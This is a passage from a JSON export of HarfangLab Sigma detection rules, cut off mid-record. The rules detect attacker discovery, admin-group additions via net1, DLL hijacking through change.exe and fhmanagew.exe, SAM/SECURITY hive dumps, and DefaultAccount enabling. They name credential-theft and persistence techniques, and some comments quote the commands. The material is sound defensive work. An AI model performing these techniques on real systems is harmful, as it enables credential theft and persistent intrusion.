"rule_description": "Detects the identification of the system's default language by querying the registry.\nAdversaries may attempt to gather information about a victim's default language to infer the geographical location of that host.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1614.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "797363ca-0ede-4edd-b4bf-67f74a6b356e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619688Z",
"creation_date": "2026-03-23T11:45:34.619690Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619694Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/",
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1033_users_macos.yml",
"content": "title: Users Listed via Users Command\nid: 797363ca-0ede-4edd-b4bf-67f74a6b356e\ndescription: |\n Detects the execution of the users command.\n Attackers may use it during the discovery phase of an attack to retrieve the list of existing users.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2022/11/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1087.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/users'\n ParentImage|contains: '?'\n\n exclusion_intunes:\n ParentImage: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n exclusion_interactive_sh:\n ParentImage: '/bin/bash'\n ParentCommandLine: '/bin/sh'\n\n exclusion_ivantie:\n ParentImage: '/usr/local/com.ivanti.cloud.agent/IvantiAgent/Engines/UNO.AUTOMATION.ENGINEMAC64/AutomationEngine'\n\n exclusion_globalprotect:\n ParentImage: '/Applications/GlobalProtect.app/Contents/Resources/PanGpHip'\n\n exclusion_withsecur:\n ParentImage: '/Library/WithSecure/bin/wsswupd.xpc/Contents/MacOS/wsswupd'\n\n exclusion_xpc:\n GrandparentImage: '/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service'\n\n exclusion_intune:\n GrandparentImage: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n exclusion_pulsesecure:\n GrandparentCommandLine: '/bin/sh /Library/Application Support/Pulse Secure/Pulse/Uninstall.app/Contents/Resources/uninstaller'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "797363ca-0ede-4edd-b4bf-67f74a6b356e",
"rule_name": "Users Listed via Users Command",
"rule_description": "Detects the execution of the users command.\nAttackers may use it during the discovery phase of an attack to retrieve the list of existing users.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "797b2aff-faa6-4227-9ced-54959b8f6c2c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621509Z",
"creation_date": "2026-03-23T11:45:34.621511Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621516Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://attack.mitre.org/techniques/T1078",
"https://attack.mitre.org/techniques/T1098"
],
"name": "t1078_net_administrators_add.yml",
"content": "title: User Added to the Administrators Group\nid: 797b2aff-faa6-4227-9ced-54959b8f6c2c\ndescription: |\n Detects the execution of net.exe to add user to the administrators group.\n This is often used by attackers to evade defense and keep persistence via an 'administrators' account.\n It is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\nreferences:\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://attack.mitre.org/techniques/T1078\n - https://attack.mitre.org/techniques/T1098\ndate: 2021/04/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1078\n - attack.t1098\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # net localgroup administrators\n # net group \"domain admins\" /add\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_cmd1:\n CommandLine|contains:\n - ' localgroup '\n - ' group '\n - ' groups '\n selection_cmd2:\n # matches administrators, administrateurs, domain admin, ...\n CommandLine|contains: 'admin'\n selection_cmd3:\n CommandLine|contains:\n - '/add'\n - '\\add'\n\n exclusion_programfiles:\n ProcessAncestors|contains:\n - '\\cmd.exe|?:\\Program Files\\'\n - '\\cmd.exe|?:\\Program Files (x86)\\'\n - '\\powershell.exe|?:\\Program Files\\'\n - '\\powershell.exe|?:\\Program Files (x86)\\'\n - '\\net.exe|?:\\Program Files\\'\n - '\\net.exe|?:\\Program Files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - 
'\\cmd.exe|?:\\Windows\\AdminArsenal\\PDQDeployRunner\\'\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\MININT\\Tools\\X64\\TsManager.exe|'\n\n exclusion_openvpn:\n CommandLine|contains: 'OpenVPN Administrators' # C:\\WINDOWS\\system32\\net1 localgroup \"OpenVPN Administrators\" \"user\" /add\n\n exclusion_ipam:\n # powershell.exe -Executionpolicy bypass -file \\\\xxxxSYSVOL\\xxxx\\Policies\\{5b6c301d-0b7a-4680-ae55-73a1da6c7fb0}\\Machine\\Scripts\\Startup\\ipamprovisioning.ps1 DNS IPAMUG@xxxxx S-1-5-21-746137067-436374069-1708511111-22222\n ProcessGrandparentCommandLine|contains|all:\n - 'ipamprovisioning.ps1'\n - 'IPAMUG@'\n # C:\\Windows\\system32\\net1 localgroup Administrateurs /add IPAMUG@xxxxx\n # C:\\Windows\\system32\\net1 localgroup DnsAdmins /add IPAMUG@xxxxxx\n ProcessCommandLine|contains|all:\n - 'net1 localgroup '\n - '/add IPAMUG@'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "797b2aff-faa6-4227-9ced-54959b8f6c2c",
"rule_name": "User Added to the Administrators Group",
"rule_description": "Detects the execution of net.exe to add a user to the administrators group.\nThis is often used by attackers to evade defenses and maintain persistence via an 'administrators' account.\nIt is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2021-04-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1078",
"attack.t1098"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "798ca376-4cbf-466a-8b6f-3522cf77558e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097080Z",
"creation_date": "2026-03-23T11:45:34.097082Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097087Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_change.yml",
"content": "title: DLL Hijacking via change.exe\nid: 798ca376-4cbf-466a-8b6f-3522cf77558e\ndescription: |\n Detects potential Windows DLL Hijacking via change.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'change.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\regapi.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "798ca376-4cbf-466a-8b6f-3522cf77558e",
"rule_name": "DLL Hijacking via change.exe",
"rule_description": "Detects potential Windows DLL Hijacking via change.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "798d887e-cd4b-4b6d-8d33-a6fb2f774b7e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096456Z",
"creation_date": "2026-03-23T11:45:34.096458Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096462Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fhmanagew.yml",
"content": "title: DLL Hijacking via fhmanagew.exe\nid: 798d887e-cd4b-4b6d-8d33-a6fb2f774b7e\ndescription: |\n Detects potential Windows DLL Hijacking via fhmanagew.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fhmanagew.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\fhsvcctl.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "798d887e-cd4b-4b6d-8d33-a6fb2f774b7e",
"rule_name": "DLL Hijacking via fhmanagew.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fhmanagew.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "799ad1f2-f955-49de-b1e0-3750739c3a3b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094900Z",
"creation_date": "2026-03-23T11:45:34.094902Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094907Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-intelligence/clipping-silver-sparrows-wings/",
"https://attack.mitre.org/techniques/T1217/"
],
"name": "t1217_quarantine_discovery_sqlite3.yml",
"content": "title: Quarantine Database Queried via sqlite3\nid: 799ad1f2-f955-49de-b1e0-3750739c3a3b\ndescription: |\n Detects the macOS quarantine database (LSQuarantine, associated with XProtect) being read using sqlite3.\n Adversaries may read the quarantine database to determine the URL their payload was downloaded from.\n It is recommended to verify that the process performing the read operation has a legitimate reason to do so.\nreferences:\n - https://redcanary.com/blog/threat-intelligence/clipping-silver-sparrows-wings/\n - https://attack.mitre.org/techniques/T1217/\ndate: 2024/06/12\nmodified: 2025/06/09\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1217\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/sqlite3'\n CommandLine|contains: 'LSQuarantine'\n\n exclusion_firefox:\n ParentImage: '/Applications/Firefox.app/Contents/MacOS/firefox'\n\n exclusion_florp:\n ParentImage: '/Applications/Floorp.app/Contents/MacOS/floorp'\n\n exclusion_beyondtrust:\n ParentImage: '/Library/PrivilegedHelperTools/com.beyondtrust.interrogator'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "799ad1f2-f955-49de-b1e0-3750739c3a3b",
"rule_name": "Quarantine Database Queried via sqlite3",
"rule_description": "Detects the macOS quarantine database (LSQuarantine, associated with XProtect) being read using sqlite3.\nAdversaries may read the quarantine database to determine the URL their payload was downloaded from.\nIt is recommended to verify that the process performing the read operation has a legitimate reason to do so.\n",
"rule_creation_date": "2024-06-12",
"rule_modified_date": "2025-06-09",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1217"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "799bf7ed-6853-4d17-898d-d80f3463dd20",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627782Z",
"creation_date": "2026-03-23T11:45:34.627785Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627790Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/002/"
],
"name": "t1003_002_sensitive_reg_save.yml",
"content": "title: SAM or SECURITY Hives Dumped from Registry\nid: 799bf7ed-6853-4d17-898d-d80f3463dd20\ndescription: |\n Detects a registry save to file operation performed on the SAM or SECURITY registry hives.\n The Security Account Manager (SAM) and SECURITY registry hives in Microsoft Windows store sensitive user authentication and security policy information.\n These operations are a common tactic used by attackers to extract sensitive information that can be used for lateral movement.\n It is recommended to verify the legitimacy of the export and check for unusual network connections and authentications to the target machine.\n Note that saves performed by lsass.exe or by an image located under Program Files are filtered out by this rule and will not raise this alert.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\ndate: 2024/06/10\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SaveKey'\n TargetObject|startswith:\n - 'HKLM\\SECURITY'\n - 'HKLM\\SAM'\n\n # This is handled by the rule 90acffa0-c732-46ee-84c6-fd4eafaad163\n filter_secretsdump:\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n HivePath:\n - '?:\\windows\\system32\\\\????????.tmp'\n - '?:\\Windows\\Temp\\\\????????.tmp'\n TargetObject:\n - 'HKLM\\SECURITY'\n - 'HKLM\\SAM'\n\n # This is handled by the rule caa50242-5304-4ee7-8016-d72b99d151af\n filter_donpapi:\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n HivePath:\n - '?:\\windows\\system32\\\\????????????.log'\n - '?:\\Windows\\Temp\\\\????????????.log'\n TargetObject:\n - 'HKLM\\SECURITY'\n - 'HKLM\\SAM'\n\n filter_lsass:\n Image: '?:\\Windows\\System32\\lsass.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\Windows\\Downloaded Program Files\\' # ActiveX\n\n exclusion_bmcsoftware:\n ProcessAncestors|contains: ':\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCDsvc.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "799bf7ed-6853-4d17-898d-d80f3463dd20",
"rule_name": "SAM or SECURITY Hives Dumped from Registry",
"rule_description": "Detects a registry save to file operation performed on the SAM or SECURITY registry hives.\nThe Security Account Manager (SAM) and SECURITY registry hives in Microsoft Windows store sensitive user authentication and security policy information.\nThese operations are a common tactic used by attackers to extract sensitive information that can be used for lateral movement.\nIt is recommended to verify the legitimacy of the export and check for unusual network connections and authentications to the target machine.\nNote that saves performed by lsass.exe or by an image located under Program Files are filtered out by this rule and will not raise this alert.\n",
"rule_creation_date": "2024-06-10",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79a1e2a3-10db-45b0-820f-0c1c86c67d8e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089461Z",
"creation_date": "2026-03-23T11:45:34.089463Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089468Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#defaultaccount",
"https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/",
"https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/",
"https://attack.mitre.org/techniques/T1078/001/"
],
"name": "t1078_001_defaultaccount_enabled.yml",
"content": "title: DefaultAccount Account Enabled\nid: 79a1e2a3-10db-45b0-820f-0c1c86c67d8e\ndescription: |\n Detects the enabling (Security event 4722) of the DefaultAccount account (RID 503), also known as the Default System Managed Account (DSMA).\n This account is disabled by default; attackers may enable it to maintain access to the victim system as a persistence mechanism.\n It is recommended to investigate which account performed this change and to determine its legitimacy.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#defaultaccount\n - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\n - https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/\n - https://attack.mitre.org/techniques/T1078/001/\ndate: 2023/12/12\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1078.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4722\n TargetSid|endswith: '-503'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79a1e2a3-10db-45b0-820f-0c1c86c67d8e",
"rule_name": "DefaultAccount Account Enabled",
"rule_description": "Detects the enabling (Security event 4722) of the DefaultAccount account (RID 503), also known as the Default System Managed Account (DSMA).\nThis account is disabled by default; attackers may enable it to maintain access to the victim system as a persistence mechanism.\nIt is recommended to investigate which account performed this change and to determine its legitimacy.\n",
"rule_creation_date": "2023-12-12",
"rule_modified_date": "2025-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1078.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79ab02be-b5f1-4e8e-a6c0-279428aa8529",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071495Z",
"creation_date": "2026-03-23T11:45:34.071497Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071501Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/",
"https://attack.mitre.org/techniques/T1137/002/"
],
"name": "t1137_002_office_test_key.yml",
